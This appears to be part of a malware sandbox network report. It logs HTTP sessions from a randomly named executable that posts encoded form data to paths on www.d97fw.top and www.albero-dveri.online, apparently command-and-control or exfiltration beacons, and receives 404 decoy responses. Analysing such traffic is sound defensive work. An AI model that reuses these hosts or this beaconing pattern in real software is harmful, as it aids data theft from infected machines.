                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.1249763206.119.82.172804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:56.252382040 CEST817OUTPOST /j0mp/ HTTP/1.1
                                      Host: www.d97fw.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.d97fw.top
                                      Referer: http://www.d97fw.top/j0mp/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 55 39 42 79 77 62 73 51 58 72 37 6c 2f 53 51 70 73 6e 50 66 6e 64 70 2b 54 7a 32 51 73 34 73 75 63 78 63 59 33 30 7a 2b 6f 31 5a 78 4e 58 73 47 49 73 4e 36 51 6f 44 79 46 31 68 6b 74 56 47 72 63 39 35 4f 56 2f 32 65 46 33 44 48 4d 52 75 6c 77 63 7a 4c 32 6a 43 5a 54 6d 54 6f 39 74 78 6d 44 34 46 54 52 33 78 53 63 58 46 46 62 2b 7a 44 6b 55 35 64 37 72 48 6c 42 36 32 77 68 38 68 70 43 6a 57 79 55 5a 46 78 58 4b 52 6c 56 66 2b 52 2f 70 52 65 4e 48 6a 50 6b 59 6f 42 46 58 70 6a 63 39 43 4a 64 76 75 63 66 45 2f 4d 47 62 62 78 45 61 48 5a 6b 64 58 4d 76 4f 53 4d 2b 36 76 41 75 77 3d 3d
                                      Data Ascii: H2y4Q2Q8=U9BywbsQXr7l/SQpsnPfndp+Tz2Qs4sucxcY30z+o1ZxNXsGIsN6QoDyF1hktVGrc95OV/2eF3DHMRulwczL2jCZTmTo9txmD4FTR3xScXFFb+zDkU5d7rHlB62wh8hpCjWyUZFxXKRlVf+R/pReNHjPkYoBFXpjc9CJdvucfE/MGbbxEaHZkdXMvOSM+6vAuw==
                                      Sep 22, 2024 17:38:57.151693106 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:57 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "66df00c6-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.1249764206.119.82.172804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:58.802130938 CEST837OUTPOST /j0mp/ HTTP/1.1
                                      Host: www.d97fw.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.d97fw.top
                                      Referer: http://www.d97fw.top/j0mp/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 55 39 42 79 77 62 73 51 58 72 37 6c 2f 78 49 70 68 6e 7a 66 72 74 70 35 50 44 32 51 6d 59 73 69 63 78 41 59 33 31 32 6a 6f 48 39 78 4e 32 63 47 47 4e 4e 36 54 6f 44 79 63 46 68 6c 6a 31 47 30 63 39 6c 73 56 39 69 65 46 33 2f 48 4d 52 65 6c 78 76 62 49 32 7a 43 58 47 32 54 71 35 74 78 6d 44 34 46 54 52 33 6b 33 63 58 4e 46 59 50 44 44 32 32 52 61 32 4c 48 6d 52 61 32 77 6c 38 68 74 43 6a 58 66 55 62 77 71 58 49 70 6c 56 65 4f 52 78 59 52 64 44 48 6a 57 71 34 70 50 42 30 49 33 54 72 4f 59 42 76 53 61 41 6b 36 70 4b 39 4b 72 62 6f 50 50 78 65 44 42 69 5a 72 38 7a 35 53 4a 31 35 39 6c 58 6f 58 68 79 66 46 52 30 4a 54 51 6c 68 49 4f 61 68 67 3d
                                      Data Ascii: H2y4Q2Q8=U9BywbsQXr7l/xIphnzfrtp5PD2QmYsicxAY312joH9xN2cGGNN6ToDycFhlj1G0c9lsV9ieF3/HMRelxvbI2zCXG2Tq5txmD4FTR3k3cXNFYPDD22Ra2LHmRa2wl8htCjXfUbwqXIplVeORxYRdDHjWq4pPB0I3TrOYBvSaAk6pK9KrboPPxeDBiZr8z5SJ159lXoXhyfFR0JTQlhIOahg=
                                      Sep 22, 2024 17:38:59.711231947 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:59 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "66df00c6-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.1249765206.119.82.172804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:01.379602909 CEST1850OUTPOST /j0mp/ HTTP/1.1
                                      Host: www.d97fw.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.d97fw.top
                                      Referer: http://www.d97fw.top/j0mp/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 55 39 42 79 77 62 73 51 58 72 37 6c 2f 78 49 70 68 6e 7a 66 72 74 70 35 50 44 32 51 6d 59 73 69 63 78 41 59 33 31 32 6a 6f 48 31 78 4e 41 49 47 47 71 5a 36 53 6f 44 79 44 31 68 67 6a 31 48 75 63 39 39 6f 56 39 2b 30 46 78 7a 48 57 77 2b 6c 32 65 62 49 6a 44 43 58 65 47 54 72 39 74 77 6d 44 34 56 50 52 33 30 33 63 58 4e 46 59 4d 4c 44 67 55 35 61 30 4c 48 6c 42 36 32 43 68 38 68 52 43 6a 4f 71 55 62 6c 66 58 59 4a 6c 55 2b 65 52 7a 71 4a 64 50 48 6a 44 70 34 6f 53 42 30 45 42 54 74 71 55 42 76 57 38 41 6d 71 70 5a 4a 7a 68 48 63 58 54 71 66 50 78 6d 6f 72 38 6f 62 4b 63 30 71 70 47 48 71 7a 41 2f 4f 78 6e 32 61 2f 61 67 67 55 70 42 6e 68 4c 62 37 59 62 4f 35 79 30 77 6c 5a 72 53 33 4a 51 72 53 76 72 30 37 78 35 4f 54 37 59 36 48 64 43 70 2f 63 31 6a 31 69 61 36 38 62 47 4d 52 51 6a 46 56 69 2b 46 78 35 71 67 6b 6b 74 72 44 67 63 6e 38 73 74 6e 58 42 6e 56 36 30 31 4c 65 64 62 45 48 42 34 4e 4f 52 72 77 6c 61 51 75 67 61 55 34 47 4b 67 76 4e 2f 59 52 63 43 77 2b 6c 72 4c 39 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=U9BywbsQXr7l/xIphnzfrtp5PD2QmYsicxAY312joH1xNAIGGqZ6SoDyD1hgj1Huc99oV9+0FxzHWw+l2ebIjDCXeGTr9twmD4VPR303cXNFYMLDgU5a0LHlB62Ch8hRCjOqUblfXYJlU+eRzqJdPHjDp4oSB0EBTtqUBvW8AmqpZJzhHcXTqfPxmor8obKc0qpGHqzA/Oxn2a/aggUpBnhLb7YbO5y0wlZrS3JQrSvr07x5OT7Y6HdCp/c1j1ia68bGMRQjFVi+Fx5qgkktrDgcn8stnXBnV601LedbEHB4NORrwlaQugaU4GKgvN/YRcCw+lrL9R91FDJyJ/VbKY1PumNKSzuDGi6vm1b/QU9+S8Zm1cbTAKzKZdzZ5Hxe/HcKe3tE8fRsuSxAxktcpHGUIQsONDBQQQ/cR1GVdAMzwfMuO0r19I+9gdtpNpFgsTim/sLNbN+e3NbLJyhM5EXaMWEn/Sjk5c7bmNgP5YGsM3Lb30ITnYOxImtEF8EjCtehhNcViEF8Vag40jiRfvUWR6F4VV1xblu/FRT/gSQokuHcWRNqT2KTolqTdyf32xHqHWrNhPFvqe46HRZiXCqJKlp5HotQ/gUP4HXN7II08D1vl6O9fwX7Ame4ykct28rFOro2/zdzoBifRY2kPXkc3+XfavIzIWP7zzMUr9gX61F6BpVDzOVMB/tAaeJs4bb2/bYSYhe55lkF7hMOnbpf83f2d/Pe21kHHVFRTBYigjJht3sDC1OQCFN/2yq25nUL3L7Q8ccJc0imIpink8SAINyhWH9zriFnbLfHbLzuxACaGfVo/V114myUfaNAegsy6EYA8SiCGsi7Z4HTOkdu53A4FlFvDg2veuYSXde0Ri/hpo+z2XtIlEO2Rs+hCNb3391886wVE63O/BzZG41W9qRVbbMB7P4QUrnTkGOBFsTvgUIR/XjFngLW/K0MFpj6oOKnQWTJ823ej3+wu5qsw31XuhK7JSiwtwXBJhn [TRUNCATED]
                                      Sep 22, 2024 17:39:02.566932917 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "66df00c6-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.1249766206.119.82.172804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:04.009948015 CEST551OUTGET /j0mp/?H2y4Q2Q8=Z/pSzs4YWamdiRAplR/Ej5tGRhiBgJB9bxIOyGq96zoZD1hQH/defqLrGltjrHK/beRpV4qUbRPgIh2e4d3W0Xm6R3nN1+YhCvZ1f10jcDAfTuCZhGE4//M=&Bz=dVmT HTTP/1.1
                                      Host: www.d97fw.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:39:04.940844059 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:04 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "66df00c6-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.1249767194.58.112.174804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:10.154851913 CEST847OUTPOST /1c4z/ HTTP/1.1
                                      Host: www.albero-dveri.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.albero-dveri.online
                                      Referer: http://www.albero-dveri.online/1c4z/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6a 46 66 49 55 57 2b 63 43 58 50 48 6f 54 30 41 33 34 6a 67 4d 5a 72 68 57 61 65 67 33 64 6f 58 6a 37 6e 61 35 5a 48 4a 6a 59 35 31 43 4f 62 76 49 6f 69 5a 6b 39 56 6b 44 4e 53 73 78 4d 78 39 52 78 70 41 73 48 6a 79 2b 65 4f 47 68 58 76 36 58 70 42 49 35 6a 54 36 33 64 42 6e 55 33 4e 7a 4d 79 4f 53 4b 64 74 4c 38 57 34 71 4c 30 2b 45 54 67 67 5a 30 6b 79 58 57 7a 4e 79 4b 31 6a 43 78 37 76 48 52 5a 38 4f 75 62 53 32 58 4a 6e 32 30 48 35 61 73 70 39 6c 54 2b 2f 74 4a 31 4e 34 69 32 50 38 37 47 59 46 36 2f 5a 53 42 74 51 48 54 39 57 37 32 56 48 35 71 76 70 37 66 72 7a 47 51 51 3d 3d
                                      Data Ascii: H2y4Q2Q8=jFfIUW+cCXPHoT0A34jgMZrhWaeg3doXj7na5ZHJjY51CObvIoiZk9VkDNSsxMx9RxpAsHjy+eOGhXv6XpBI5jT63dBnU3NzMyOSKdtL8W4qL0+ETggZ0kyXWzNyK1jCx7vHRZ8OubS2XJn20H5asp9lT+/tJ1N4i2P87GYF6/ZSBtQHT9W72VH5qvp7frzGQQ==
                                      Sep 22, 2024 17:39:11.129158974 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                      Sep 22, 2024 17:39:11.129206896 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                      Sep 22, 2024 17:39:11.129241943 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                      Sep 22, 2024 17:39:11.129275084 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0
                                      Sep 22, 2024 17:39:11.129623890 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.1249768194.58.112.174804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:12.789741039 CEST867OUTPOST /1c4z/ HTTP/1.1
                                      Host: www.albero-dveri.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.albero-dveri.online
                                      Referer: http://www.albero-dveri.online/1c4z/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6a 46 66 49 55 57 2b 63 43 58 50 48 71 79 45 41 31 66 33 67 4a 35 72 69 5a 36 65 67 68 74 6f 54 6a 37 37 61 35 59 54 6a 6a 4f 42 31 4d 4f 72 76 4a 73 57 5a 6e 39 56 6b 4d 74 54 6b 31 4d 78 69 52 78 6b 31 73 47 66 79 2b 65 71 47 68 56 33 36 57 65 39 58 32 54 54 38 38 39 42 68 61 58 4e 7a 4d 79 4f 53 4b 5a 45 6d 38 57 77 71 4c 6c 4f 45 53 43 49 47 6f 30 79 55 66 54 4e 79 4f 31 6a 47 78 37 75 71 52 62 5a 6c 75 5a 71 32 58 4d 44 32 30 57 35 62 37 35 39 6e 63 65 2b 6f 4f 57 51 6b 37 31 33 69 2b 58 35 68 36 38 56 6b 4a 4c 42 64 4d 50 65 74 6a 57 54 30 6e 34 51 4c 53 6f 4f 50 4c 52 62 56 72 42 71 43 71 34 33 68 66 63 2f 65 47 30 30 79 37 79 34 3d
                                      Data Ascii: H2y4Q2Q8=jFfIUW+cCXPHqyEA1f3gJ5riZ6eghtoTj77a5YTjjOB1MOrvJsWZn9VkMtTk1MxiRxk1sGfy+eqGhV36We9X2TT889BhaXNzMyOSKZEm8WwqLlOESCIGo0yUfTNyO1jGx7uqRbZluZq2XMD20W5b759nce+oOWQk713i+X5h68VkJLBdMPetjWT0n4QLSoOPLRbVrBqCq43hfc/eG00y7y4=
